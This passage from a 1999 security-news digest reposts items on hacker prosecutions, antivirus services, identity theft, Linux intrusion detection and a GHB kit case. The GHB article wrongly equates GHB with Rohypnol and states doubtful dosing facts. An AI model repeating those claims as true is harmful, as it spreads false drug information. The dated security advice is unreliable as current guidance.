piece of the pie. How has that changed over the last two years?
A: I would say that four years ago, it was 10%, and now it's 90%. It's a lot. Although I've had a heavy six
months on violence in music, too. Music has always represented some social rebellion, and the Internet has
become a socially rebellious child, in essence, for a lot of mainstream business and parents. For everybody
else who is used to a certain way of life, the Internet is just banging on their door, just like that nasty rock and
roll that you wish would leave your daughter alone.
Q: So over time, the Internet may put more power into independent labels? In the next couple of
years, the independents may take more of the pie?
A: I actually don't think that the pie stays the same size. I think the pie expands.
Q: How long does it take record companies to realize that?
A: Maybe it took a minute longer than it took every other smart person in the world, but they're there.
The majors take a lot of knocks for being slow to come to this thing. And, you know, some of it deservedly
so. But I think that also a business reporter would understand this because, they're sitting on billions of dollars
of assets on behalf of artists and their companies.
[Nearly] 99% of their sales are still in bricks and mortar retail. That's a huge responsibility, [and explains] the
concept that they were a little more thoughtful about how to go forward in this space than a kid changing the
world, sitting in his mom's bedroom with his own computer.
@HWA
13.0 ReDaTtAcK CHARGED ANYWAYS
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 8:35 pm CET
ISP Belgacom Skynet, which was compromised by the hacker ReDaTtAcK last
week, has after an initial statement that they wouldn't press charges decided to do a
180 and charge him anyways. This is after the hacker sent the ISP a fax himself to
inform them about the holes in their systems.
@HWA
14.0 NA/MCAFEE RELEASES NEW VIRUS SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 3:05 am CET
Network Associates will this week unveil its ActiveShield service, which will deliver
anti-virus software updates to users' computers whenever they are connected to the
Internet. In this way users will receive fixes as soon as they are made availble. Read
more
--------------------------------------------------------------
This story was printed from Inter@ctive Week,
located at http://www.zdnet.com/intweek.
--------------------------------------------------------------
McAfee Launches New Virus Service
By Mel Duvall, Inter@ctive Week
August 16, 1999 1:15 PM PT
URL: http://www.zdnet.com/intweek/stories/news/0,4164,2315320,00.html
Network Associates will unveil technology this week that it said will revolutionize the process of
keeping computers updated with the latest anti-virus software.
The security firm's McAfee division will launch its ActiveShield service through its McAfee.com
Web site, which will deliver anti-virus software updates to users' computers whenever they are
connected to the Internet.
Anthony Kim, manager of McAfee Clinic, said the software has the potential to limit the damage
caused by such outbreaks as the Melissa virus, because users will receive fixes as soon as they are
available.
The ActiveShield software pings the McAfee server daily to check for software updates, patches
or fixes. It gives the user the option of downloading and installing the fix, or doing it at a later date.
McAfee will price ActiveShield at $39.95 for a yearly subscription. But, for a limited time, it will
be $19.95.
@HWA
15.0 TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 2:50 am CET
Two man have been charged by the Michigan attorney general in connection with
allegedly promoting the sale and at-home manufacture of the "date-rape" drug.
Attorney General Jennifer M. Granholm, D, also said the two men have been filed with
notice to stop within 10 days the sale of the so-called "kits" to make the drug, or face
additional criminal charges and penalties of up to 90 days in jail, a $5,000 fine, or
both. For now they have been charged with one count of solicitation to manufacture a
controlled substance and face a maximum of 30 years in jail if convicted. Newsbytes
Two Charged With Promoting Date-Rape Drug Via The Net
http://www.newsbytes.com/pubNews/99/134907.html
By Bob Woods, Newsbytes
LANSING, MICHIGAN, U.S.A.,
16 Aug 1999, 3:21 PM CST
Two men who live outside Michigan have been charged by that state's attorney general in connection with
allegedly promoting the sale and at-home manufacture of the controversial drug gamma- hydroxybutyrate
(GHB), better known as the "date-rape drug."
Attorney General Jennifer M. Granholm, D, also said the two men have been filed with notice to stop within 10 days the sale
of the so-called "kits" to make the drug, or face additional criminal charges and penalties of up to 90 days in jail, a $5,000
fine, or both.
The action marks the first time a criminal prosecution has been initiated as a result of selling GHB over the Internet, attorney
general spokesperson Chris DeWitt told Newsbytes today.
Both Carl Gorton, 63, of Merritt Island, Fla., and John Hedrick, 22, of Colorado Springs, Co., are now were charged with one
count of solicitation to manufacture a controlled substance. Charges were filed in 36th Judicial District Court in Detroit.
Gorton and Hedrick now face felony charges and a maximum penalty of 30 years in jail, if convicted. Gorton was at large as
of this afternoon, while Hedrick had been arrested and is now out on bond, DeWitt said.
GHB, which is marketed as Rohypnol, is also known as roofies, liquid ecstasy, liquid X and organic Quaalude, among other
names. A 2-milligram (mg) dose of GHB can result in unconsciousness within 20 minutes of ingestion, usually through a
drink laced with the drug. The next morning, the person who took the drug has no memory of the previous evening's events.
Gorton and Hedrick "knowingly and intentionally" solicited undercover agents from the attorney general office's new High
Tech Crime Unit to make GMB through the sale of a "do-it-yourself" GHB ingredient kit, authorities say.
A Website owned by Gorton allegedly advocated and encouraged the use of GHB, and stated that the company can offer
"legally available GHB" because it has "concluded that the chemical components could be sold as a kit and combined by
customers at home without special equipment, all of which is safe and perfectly legal," Granholm's office also said.
"Selling a dangerous, controlled substance on the Internet doesn't make it safe, and it certainly doesn't make it legal,"
Granholm said in a statement.
The alleged action occurred via the Website sponsored by "Centurian Aging Research Laboratory" (CARL). The CARL
Website included an order form that directed customers to send cash or money orders to a post office box registered to
Hedrick, the attorney general's office also said.
The Website is no longer active, DeWitt said.
GHB, under Michigan law, is a Schedule 1 controlled substance, which makes it illegal to use, manufacture or possess the
drug in the Wolverine State. Soliciting or inducing the manufacture of such controlled substances is also illegal.
DeWitt said the attorney general was within the scope of her office to go after the two suspects. "It would be no different if
someone called a person in Indiana to buy heroin, and it was then shipped (to Michigan)," he said.
Granholm's High Tech Crime Unit is made up of three assistant attorneys general, one investigator, and support staff,
DeWitt said. The team, which is a part of the attorney general office's criminal division, deals with illegal activities conducted
via the Internet on both a criminal and civil basis.
"With the Internet becoming more and more available, there are those who will take advantage of other people," he added.
Reported By Newsbytes.com, http://www.newsbytes.com .
15:21 CST
Reposted 16:51 CST
@HWA
16.0 E-COMMERCE AND PRIVACY
~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 2:45 am CET
NFO Interactive conducted a survey on how netizens feel about e-commerce and
privacy. The survey polled more than 4.500 Internet users of which 1.944 had never
made an online purchase. Nearly 70 percent of that number would make online
purchases if they had assurances that their privacy would be guaranteed. More on
this survey
Online Consumers Demand E-Commerce Privacy - Study
http://www.newsbytes.com/pubNews/99/134914.html
By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A.,
16 Aug 1999, 4:19 PM CST
The majority of Internet users who are not currently participating in e-commerce would be more likely make
purchases online if they felt comfortable that their privacy would be guaranteed, a soon-to-be- released study
found.
Nearly 70 percent of those netizens who have yet to make an Internet purchase would be enticed to do so if they had
assurances that their privacy would be protected, the survey found. Conducted by NFO Interactive, the survey polled more
than 4,500 Internet users. Nearly half of those polled (1,944) had never made an online purchase.
"It's going to be the (online) merchant's responsibility to educate the users" about privacy protections, NFO Director of
Research Tim Washer told Newsbytes today.
Other factors that reticent Internet users said would encourage them to make purchases online included deeper price
discounts (65 percent) and the ability to return defective or unwanted products to a physical location (28 percent).
Washer also stressed the potential value of independent online privacy "seal-of-approval" programs, such as those offered by
Truste and BBBOnLine. By funding, promoting and participating in those programs, e-merchants could help ameliorate some
consumer concerns about privacy, he contended.
Among the attributes survey participants said would attract them to a retail Website were: strong privacy protection
standards; access to secure purchasing servers; overall technical reliability; up-to-date content; and timely delivery.
The NFO study comes on the heels of another survey, released last week, that indicated nearly a third of all Internet users
make purchases online.
That survey, conducted by CDB Research & Consulting, found that apprehension about online shopping is dissipating as
e-commerce sites improve security procedures and make information about security more readily available.
Further information on the NFO study, "Online Retail Monitor: Branding, Segmentation & Web Sites" is available on NFO's
Website, located at http://www.nfoi.com/nfointeractive/nfoipr81699.asp .
Reported by Newsbytes.com, http://www.newsbytes.com .
16:19 CST
Reposted 16:53 CST
17.0 IDENTITY-THEFT
~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 2:30 am CET
Anyone seen the Net? Infoworld has a story on identity-theft, people who instead of
stealing from you, "become you". Your name, social security number, driver's license
number, credit record.. all can easily be hijacked. "It would never happen to me" is a
common response, but according to this article more than 500.000 people fall victim
to this "social engineering attack" in the US every year. Infoworld
August 16, 1999
Future criminals will not need to steal from
you -- they will simply `become you'
What would you say if we told you that we could "become you" if we
wanted? Establish (or ruin) your credit, cash checks, obtain a driver's license
or passport, even commit crimes -- all in your name. The sad fact is that your
name, social security number, driver's license number, credit record --
essentially what defines you in modern society -- can be easily hijacked.
"It would never happen to me" is a common response to what seems
inconceivable. The fact is, every year in the United States more than
500,000 people fall victim to this social engineering attack. And it can be one
of the most invasive, exhaustive experiences you'll ever endure.
Why do so many people each year fall prey to the identity-theft vultures of
the world? Simply put, we're too trusting. We preprint our home addresses
(and even our driver's license numbers) on our checks. We give out our
home phone number to anyone who asks. We throw sensitive bills, as well
as bank and credit statements, in the trash. The bottom line is that we, as a
society, make it too easy to become victims.
By far, the biggest opportunity for an identity thief is not by digging through
your trash or overhearing your phone number. Instead, the best time for a
thief to garner precious information is during a move. The situation provides
such a ripe opportunity for an attacker to pick up box after box of
identity-defining information such as birth certificates, social security
numbers, paycheck stubs, credit card numbers, and other personal effects.
Together, these belongings represent ample means for an attacker to obtain a
driver's license, password, and credit card.
We've accumulated a small collection of helpful hints to prevent identity theft.
Start by purchasing a cross-cut shredder for your home and business: Every
document you throw away should be carefully reviewed for sensitive
information. Never freely give out information such as address, phone
number, or driver's license number -- and never give out your social security
number (unless required to). Once your awareness is heightened, you'll be
surprised at how many people ask you for these personal items.
Obtain a post office box, and use it whenever someone requires an address.
Using your credit card over the Internet is fine, just be sure the Web site
employs SSL for card number encryption.
To get a handle on identity theft, you should also read Identity Theft: the
Cybercrime of the Millennium, by John Q. Newman, and 21st Century
Revenge: Down and Dirty Tactics for the Millennium, by Victor Santori.
Both books are from Loopanics Unlimited and give you a solid foundation
on the techniques used by thieves.
All this is little help to those who have already fallen victim to an attack.
Here's what you can do after turning into a statistic.
- Inform the three main credit-reporting bureaus -- Equifax, Experian,
and Trans Union -- by phone and letter. Ask that no new credit be
approved without your notification beforehand.
- Inform all of your current credit card and loan companies about the
theft.
- Inform all of the check-monitoring agencies, such as CheckRite,
Chexsystems, etc.
- Make sure your police department files a report on the crime, or your
future identity-theft claims may fall on deaf ears.
- Obtain a new driver's license, and inform the department of motor
vehicles that you suspect identity fraud.
- As a last resort, especially if the thief has used your social security
number to obtain credit in your name, request a new social security
number. However, be careful with this step because it can make it
difficult for you to get credit in the future.
The physical security of one's identity is as critical as any virtual electronic
bits and bytes floating through a silicon wafer or a copper wire. As more of
the components of physical identity become translated into digital form, the
two will become intrinsically intertwined.
For more details on identity theft, visit www.identitytheft.org,
www.privacyrights.org, and www.futurecrime.com.
Send your anecdotes and precautions to security_watch@infoworld.com.
@HWA
18.0 Y2K-THE MOVIE
~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:53 am CET
Nice theme for a film - Y2K. NBC will use millennium madness and try to earn money
on it. In Y2K, the bug causes an East Coast power outage, ATM failures, airliners
whose instruments don't work and other assorted calamities. Main character battles
one of the biggest imagined consequences of the bug when a nuclear power plant
threatens to go into meltdown.
@HWA
19.0 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:45 am CET
The National Criminal Intelligence Service started a unit that will try to catch on-line
pedophiles and similar perverts. Insp Terry Jones, the head of the squad, said that the
unit monitored few chat rooms for 60 hours - and as a result they arrested 19
suspects. In addition to pedophiles, the unit will investigate some other criminal
activities conducted via computers (for instance illegal gambling, blackmail, industrial
espionage). Note: read the ACPO (www.antichildporn.org) article in Default #1 here.
http://default.net-security.org/1/14.htm
XIV. Guest column
-----------------
This weeks guest column is by Natasha Grigori of the ACPO, a cause which Help Net
Security supports fully.
The mission of ACPO, and our goals:
ACPO is a non-profit Group formed to actively seek out and stop the
exploitation of children on the Internet. Our focus is to protect our
children from the predatory and perverse criminal elements that seek to
destroy their innocence. While we are firmly in favor of free speech in
all its forms, especially on the Internet, we are opposed to the active
sexual exploitation of children. We have chosen to act against the
dissemination of child pornography over the Internet. Our motivation is
the fact that there is a genuine connection between the distribution and
acceptance of pedophile pornography and actual incidents of sexually
abused children. Not to mention that all-existing hardcore pedophile
pornographic material is the result of very real abuse. Our children are
our future, as such we must protect them as we would our own lives and
in doing so ensure a better future for us all.
Our secondary focus is to educate. We want to provide individuals and
organizations training about the Internet and its associated risks. We
will counsel law enforcement on the Internet aspects of gathering
information and evidence. We pursue all of our goals with the ethical
and moral values of most anybody confronted with this abhorrent
practice. We will tolerate only approaches, and condone no illegal
activities. Failure to abide by the ACPO operations standards is ground
enough for revocation of ACPO membership.
Our goals can be broken down as follows:
1. Provide a maximum of information to concerned law enforcement
authorities, including activity hotspots on the Internet and the results
of our own investigations into the activities of online child
pornographers.
2. Put a halt to sensationalism and hype regarding the Internet while
promoting quality investigative journalism on pedophile pornography.
3. Create enough public pressure to bring authorities to the point of
action.
4. Form a cooperative with other Internet groups with similar goals,
which will benefit us all and increase our impact. We are working to
provide a website to which our members will be able to turn for
information and resources, and will add other means of communication.
Our approach is somewhat different from other organizations, in that we
are combining the drive for wide public support with the knowledge of
Internet experts.
This is our first public description of our mission. We view this as a
work in progress that will continue to be refined.
If you have any questions or concerns about our Mission Statement,
please feel free to mail me at Natasha@infovlad.net You should get a
response from me with in a week, possibly less. And BTW look for our
exciting news next Friday.
============================
Thanks for being 'Child-Friendly'
Natasha Grigori Founder
ACPO http://www.antichildporn.org/
http://www.infovlad.net/antichildpornorg/
mailto:natasha@infovlad.net
============================
@HWA
20.0 Y2K PROBLEMS
~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:37 am CET
Y2K situation will ruin some companies. TriMark Engineering, small company behind
the Doorway program published on their site that: "I am happy to announce that ALL
released versions of the Doorway program are y2k compliant...Unfortunately the
computers used in our operations are not y2k compliant. These computers were
purchased and used before Windows 95, and are all old DOS systems. They are not
compliant and we do not have the resources to make them compliant".
http://execonn.com/doorway
@HWA
21.0 GISB WILL USE PGP
~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:29 am CET
Gas Industry Standards Board (GISB) decided that for securing transactions over the
Internet, they will use PGP (Pretty Good Privacy) technology rather than the more
popular standard developed by RSA - S/MIME (Secure/Multipurpose Internet Mail
Extension). More on the story on Internet Week.
http://www.techweb.com/se/directlink.cgi?INW19990816S0032
August 16, 1999, Issue: 777
Section: Systems & Management
Utilities Choose PGP Encryption Over S/MIME
Rutrell Yasin
Suppliers of natural gas now have a standard way of securing electronic
transactions between trading partners.
While the Gas Industry Standards Board joins a growing list of vertical
industry consortia forming such standards, it is among the first major groups to
chose PGP (Pretty Good Privacy) encryption and authentication technology
rather than the more popular S/MIME (Secure/Multipurpose Internet Mail
Extension) standard developed by RSA.
The GISB's decision to adopt PGP for its 165 corporate members-which
include Amoco, Exxon, Mobil, Con Edison and Pennsylvania Power & Light
Co.-is a major endorsement for PGP. This choice came from the fact that
PGP is file-based, providing data encryption for both e-mail and file-based
data.
Also, the group felt it was better suited for its requirements, which include data
privacy, integrity, authentication and nonrepudiation.
While the S/MIME standard also supports those core functions, it is intended
only for e-mail encryption. The GISB has been experimenting with PGP since
1996, before S/MIME became a standard, according to Carl Caldwell,
chairman of the GISB's electronic delivery mechanism committee.
GISB was looking at ways to send encrypted EDI files, using HTTP as a
transport, "but at the time, SSL [Secure Sockets Layer] was owned by
Netscape, and we didn't want to pick one specific Web server and browser,"
Caldwell said. Plus, "we needed a file-based security product."
Though S/MIME is the de facto standard for e-mail encryption and an
Internet Engineering Task Force draft specification, as well, the IETF is
working on AS2, a convergent standard that will let companies securely
exchange EDI files, using HTTP as a transport. EDI data will be packaged in
MIME messages that use public key security, Caldwell said.
PGP will help the GISB member companies secure more than 37 different
types of business transactions, from ordering space on a pipeline to moving
gas to paying for it once it reaches its destination, GISB officials said.
Based on GISB's choice of PGP, the Federal Energy Regulatory Commission
(FERC) has mandated that all members of the gas industry implement PGP
2.6 or greater to secure electronic transactions, said Carl Caldwell, chairman
of GISB's electronic delivery mechanism subcommittee.
GISB and FERC's adoption of a standard for the gas industry is a move in the
right direction, said Phil Schacter, an analyst at the Burton Group. "I like the
model of a community defining [standards]."
Still, Schacter wondered whether there would be interoperability issues
between companies using PGP 2.6 and those using newer versions with RSA
and X.509 certificates. However, Network Associates, which acquired PGP
Inc. last year and is the major supplier of PGP-based software, said it has
backward-compatible versions.
From its origins as shareware software, PGP has emerged as a de facto
standard for data encryption among consumer users and individuals, but not
many large companies are using it on an enterprise and extranet basis.
Nevertheless, under the auspices of Network Associates, PGP is evolving into
a more flexible, robust product for the corporate world, industry analysts said.
Network Associates has "broadened the scope of the application, [adding]
support for RSA [encryption] and X.509 digital certificates," Schacter said.
PGP supports other standards, such as Secure Sockets Layer (the
predecessor to the IETF-backed Transport Layer Security protocol) as well
as OpenPGP and the Lightweight Directory Assistance protocol. Network
Associates offers an integrated suite, called PGP Enterprise Security.
PGP's broadened scope is one reason GISB is adopting the technology as a
standard, said Rae McQuade, executive director of the standards
organization.
"We were attempting to develop a standard [that would operate] over a wide
variety of hardware, operating systems and programming languages," she said.
Copyright ® 1999 CMP Media Inc.
@HWA
22.0 SURF ANONYMOUS FOR $5
~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:23 am CET
Earlier this year we published that nearly 93 percent of commercial Web sites collect
some type of personal data from visitors to their sites. Many privacy related
companies are working on solutions that will help users to stay anonymous. Small
maker of privacy software Privada (www.privada.net) announced today their program
Web Incognito, a product that will allow users to surf the Web and send e-mail
anonymously.
@HWA
23.0 HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Monday 16th August 1999 on 1:30 pm CET
A 23-year-old hacker, was sentenced for two charges of unlawful modification of
computer material and two of unauthorised access to a computer to 3 years in jail
and his computer was confiscated. Scott Reid, 23, hacked into the Vodaphone short
messaging network, sending a message in text form to 32,000 international
subscribers telling them they had won a Peugeot 106 car and must ring a certain
number to claim it. The number he quoted was that of GS (UK), a Nottingham firm
supplying software for the embroidery industry, where he had previously worked. The
result, Nottingham Crown Court was told, was that the firm's business was brought to
a standstill which caused an estimated 10.000 pound loss in business. Besides that
he also infected the computer systems of this company with a trojan horse named
"Colourmatch". It appears the attacks were carried out because of a grudge Reid had
against his former employer because of a terminated project of his. This was reported
in the Daily Telegraph, thanx to ladysharrow for contributing.
@HWA
24.0 PROJECTGAMMA BACK ONLINE
~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Monday 16th August 1999 on 1:00 pm CET
The populair underground site Project Gamma (pG) has returned after an unfortunate
30-day downtime. Darkridge Security Solution (DSS), the organization that is kind
enough to provide hosting for pG, relocated their networks. After the networks
relocated, it was approximately 14-days before the vhost was restored; that was the
cause of the DSS Web site being displayed on the projectgamma.com domain. Visit
Projectgamma.com
http://www.projectgamma.com/
@HWA
25.0 DETECTING INTRUDERS IN LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 11:30 pm CET
Here's an article on system intruders in Linux. Besides dealing with how to monitor
your system and in this way detect the intruders, it also speaks about how to be
prepared for the event your systems get compromised. Because face it, intrusions
CAN happen to anyone. Read it
http://securityportal.com/direct.cgi?/topnews/tn19990816.html
Detecting Intruders in Linux
Read this week's other cover story about auditing Cisco routers
August 16, 1999 - An intrusion into your network and host systems by persons
unknown is one of the biggest nightmares for systems administrators. Many of us
don't even want to think about the possibility of this happening, or feel that our
perimeter security makes a serious intrusion a remote possibility. However,
intrusions can happen to anyone, on any public or private network. In order to
best detect and respond to an intrusion, you must first plan for an intrusion, then
have all the appropriate monitoring capabilities deployed.
Plan for an intrusion
Develop a baseline of normal operating conditions. To do this, you should audit the file system, network services,
logon activity, normal CPU load, disk utilization, etc. It is important to get a sense of what log files normally look like. A
very skilled attacker may leave little evidence of their presence, and only a full system audit can help you detect
subtle system variations later. The tools to perform audits range from the simple and familiar utilities, such as netstat,
to get network statistics and ps/top, to get CPU stats to more complex tools, such as Tripwire and Logcheck.
Tripwire takes a snapshot of your complete file system and generates an MD5 hash of the files, which can be
compared with a later snapshot to find any file system variation. Logcheck, part of the Abacus tool set, is a program
that automatically will run and check system log files for security violations and unusual activity. Running these tools
on a system that is in a pristine state before it is put into production can yield valuable information down the road.
Backups - the obligatory statement that solid backups are the only way to be certain that you can recover from an
intrusion is inserted here. Your Red Hat Package Manager (RPM) database can be a key indicator of system tampering,
so it should be backed up after package adds, deletes and changes. Also make sure you have a clean copy of the
bin/rpm binary. RPM's abilities for version control and discovering file dependencies really allow it to shine in warning of
file integrity problems.
Build an offline kit of standard system utilities. Depending upon how quick you are in detecting an intruder, you
may or may not be able to trust normal utilities, like ls, ps, top, mount, cp, mv or grep, to help you detect tampering.
A skilled attacker may substitute their own version of ls and top for example, which conveniently filter out rogue
daemons they have installed. You should have clean copies of these utilities ready to use.
Develop a response plan. A response plan can be as simple or complex as necessary, based upon the value of the
systems being protected. Who gets notified, what gets shut down, how long do we have to return to normal operating
status are all questions to be answered. The key benefit to ID planning is that we are reacting quickly and
appropriately to an intrusion instead of wasting critical time deciding what to do. A network based denial of service
attack may require that you immediately disable network services, possibly by unplugging the host from its hub. If
there has been a local compromise and malicious programs are running on the host, it may need to be shutdown
immediately. If this is an extremely crucial production host, response plans can get complex, but it still is usually better
to shut the system down, as you may be racing against a person or program that is two steps ahead of you.
Perform Network based monitoring
One element of intrusion detection is tracking activity on your network segments. Host-based intrusion detection will
tell you the attacks that reached the host and how successful they are. Network monitoring can alert you to attacks
occurring through out your network, although it may not give you information about how successful those attacks
were.
Look for stations entering or leaving your network segments. Arpwatch is a utility that will track new active MAC
addresses on your network segment. If you have an SNMP console at your disposal as well as manageable hubs or
switches, these will also be able to spot new stations coming online on your network.
Look for network sniffers. Trying to find network sniffers may be a difficult job, as they are listening to traffic, but
not transmitting anything. Neped is a utility available on Trinux that looks for stations with their NIC set to
promiscuous mode, a sure sign of a sniffer. This is not a fullproof tool, but it may be able to catch some sniffers,
particularly those based on an older Linux kernel. Some commercial sniffers have tell tale signatures, they may
broadcast a licensing packet to look for unauthorized copies of their product.
Ngrep. This is a nifty utility that you may want to run on a special management station. Ngrep uses libpcap to capture
all of your network traffic and lets you use pattern matching and filtering expressions like grep to look for specific
activities, such as all attempts to telnet to your web server. Be aware that modern ethernet switching can make it
very difficult to see all the traffic on your network. Running ngrep on a shared hub with a specific host, or perhaps
your ISP router may allow you to capture the traffic you are looking for. Some switches have the capability to "mirror"
traffic, and send all of the data from one port to another for diagnostics purposes.
Perform Host based scanning
Running the same tools used for the baseline audit on a regularly scheduled basis is a good way to validate system
integrity and look for subtle break ins. In addition, there are utilities that you may want to run on a real time monitoring
basis to find problems. Some examples:
Swatch, the Syslog Watchdog. This is a lightweight Perl program that continuously monitors SYSLOG for security
issues and can dial a pager to report exceptions.
Tiger. Written by Texas A&M in response to their own security break-in, this is actually several scripts that can be
scheduled to check a wide variety of possible vulnerabilities, such as weak permissions, and can also perform cleanup
of scratch files that may have plain text security information in them.
Tcp_wrappers is probably the most powerful way to monitor connections to network services on your host in real
time. Tcp_wrappers can log incoming connections and filter them based upon additional security criteria. Tcp_wrappers
works by tricking inetd into calling it before invoking a network service, such as your telnet or ftp daemons.
Tcp_wrappers then logs the connection and either passes the connection on the the appropriate service, such as
telnetd, or denies the connection altogether. Tcp_wrappers takes an investment in time to get the most out of it, but
is an exceptional program for providing proactive monitoring and filtering of network connections to your host.
Building secure systems is not an adequate approach to maintaining long term host security. By developing solid
intrusion detection plans, performing comprehensive security audits, and scanning both network segments and host
systems, we will have a much better chance at successful intruder detection.
@HWA
26.0 WIRELESS CRIME-FIGHTING
~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 11:00 pm CET
Two California communities are being protected by police officers with patrol car
access to crime databases and records. A new wireless mobile communication and
information system from PacketCluster Patrol software allows officers to do
background checks in the record system securely from their cars. Crime-fighting of
the future? CNN
http://cnn.com/TECH/computing/9908/12/wirelesscop.idg/index.html
Wireless crime-fighting
August 12, 1999
Web posted at: 3:51 p.m. EDT (1951 GMT)
by Dan Caterinicchia
From...
(IDG) -- Two California communities are being protected by police officers
with patrol car access to crime databases and records, thanks to a new
wireless mobile communication and information system.
PacketCluster Patrol software, produced by Cerulean Technology Inc.,
Marlborough, Mass., gives the Salinas/Monterey County Mobile Computer
Terminal Consortium access to crime-fighting data directly from patrol
car-based laptop computers.
Using the wireless network, more than 400 patrol officers in the consortium
can access records management systems and county, state and federal
databases. The officers can access secure information from one or more of
the databases in a matter of seconds with a single query.
"To be able to share records was previously unheard of.... We couldn't do it
over the radio because of the privileged nature of the information, but now
officers can do background checks on the system securely, right in their
cars," said Sgt. Tracy Molfino of the Salinas Police Department.
"Before, we didn't have the communication
between agencies, either in person or
through a third party," Molfino said. "Now
we have cross-jurisdictional communication,
and the whole system is progressing in an
appropriate fashion."
The PacketCluster Patrol system uses
wireless modems to link the consortium's
100-plus patrol cars to criminal and motor
vehicle databases.
Officers can communicate with each other
through the system. It also provides the
option of cross-referencing previous cases
and arrests with variables including
identification information, such as
birthmarks and scars, and crime patterns in
certain locations.
An unexpected bonus is that officers can run registration checks on a vehicle
to see if its license plates or registration tags have been reported stolen. With
the high price of tags in California, that service is being used daily, Molfino
said.
The alliance has four members and will be adding eight more through a
recently awarded federal grant from the Community Oriented Policing
Services' Making Officer Redeployment Effective program. With its new
members, the consortium plans to expand its wireless ability by integrating a
geographic information system application.
"With our soon-to-be 12 members, every geographic area of Monterey
County will be pulled together into one communications network," Molfino
said. "The system is only about three-quarters installed, and we're already
getting 10,000 queries a month."
@HWA
27.0 15-YEAR-OLD ADMITS HACKING INTO TCS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 6:20 pm CET
By using password "news" along with the same username, a 15-year-old boy hacked
into two Television Corporation of Singapore websites. Nice description here of how
even simple password guessing can compromise a system. Full story
http://www.straitstimes.asia1.com/cyb/cyb1_0813.html
Boy, 15, admits hacking into TCS
websites
He made an educated guess at a user name "news"
and used it as the password. He got into the TCS
server
By PAULINE LEONG
LUCK and ingenuity enabled a 15-year-old boy to hack
into two Television Corporation of Singapore (TCS)
websites on the Internet.
He made an educated guess at a user name "news" and
used the same word as the password. He got into the
TCS server.
He told another teenager, 18, about it and they both
logged on several times, disrupting the web pages for
about 10 hours.
Yesterday, the younger boy pleaded guilty in the
Juvenile Court to four charges of unauthorised entry and
disclosure of password.
Four other charges will be taken into consideration in his
sentencing.
A pre-sentence report will be submitted before the
judge decides on the punishment. On June 15 this year,
the Secondary 2 student was watching TV at home
when he saw an advertisement showing the Internet
address www.mediacity.com.sg.
He decided to visit the website and used a software
function in his computer to connect to the Mediacity
server.
After trying various combinations of user names and
passwords to get into the server, he struck gold with
"news". He started exploring the directories and files
there.
Then he told the 18-year-old whom he had met chatting
on the Internet that the server had security weaknesses.
He also told him the access code "news".
The older boy, an O-level student in a private school,
logged on, using a "wingate" to mask his identity. This is
a proxy server used to avoid detection.
On his advice, the younger boy also used a wingate.
The older boy told him to look for more access codes,
in case the system administrator disabled their "news"
account.
The boy found a file called "passwd" which contained all
the authorised user names and their corresponding
encrypted passwords.
He then told the older boy the new user names and
passwords, "informix" in particular, and they both used
them.
The younger boy was arrested seven days later at his
home in Clementi. The 18-year-old has been charged.
Defence lawyer David Nayar said in mitigation that the
15-year-old was curious and merely guessed at the
access code "news".
According to the lawyer, the boy did not alter any
documents or files, but in his excitement, revealed the
access code to another person.
He added that the boy has since regretted his actions.
A first offender, the 15-year-old is the younger of two
boys in his family. His father is a product engineer and
his mother, a housewife.
They have already banned him from using the Internet.
@HWA
28.0 JAPAN CLEARS WIRETAP BILL
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 6:00 pm CET
Japan's upper house of parliament has approved a controversial bill that gives police
the power to intercept communications such as telephone calls and Internet e-mail as
part of their investigations into organised crime. Untill now, Japan had been the only
G8 nation which did not use wiretapping in the course of criminal investigations. Read
more below
http://www.technologypost.com/internet/DAILY/19990813103941567.asp?Section=Main
Published on Friday, August 13, 1999
INTERNET
Communications
interception Bill clears
Japan's upper house
NEWSBYTES
Lawmakers in Japan's upper house of parliament
approved yesterday a controversial bill that gives police
the power to intercept communications such as
telephone calls and Internet e-mail as part of their
investigations into organised crime.
Having already cleared the lower house, the vote was
the final hurdle to the bill becoming law.
Japan had been the only G8 nation which did not use
wiretapping in the course of criminal investigations.
Lawmakers approved a package of three Bills designed
to help police fight organised crime but it was the
communications interception bill that prompted the most
debate and argument.
The Bill is designed to help police battle organised crime
and as such restricts the interception of communications
to cases involving illegal drugs, weapons, organised
group illegal entry into Japan, and organised murders.
Campaigners against the bill have a number of fears.
Chief among these is that it infringes on an individuals
right to privacy. They also worry that police may use
information intercepted that is unrelated to the crime
under investigation and safeguards on the restriction of
use to certain types of crime will prove ineffective.
But the government supports the Bill saying it will help
the police greatly in the battle against organised crime
and groups like the Aum Shinrikyo religious cult that
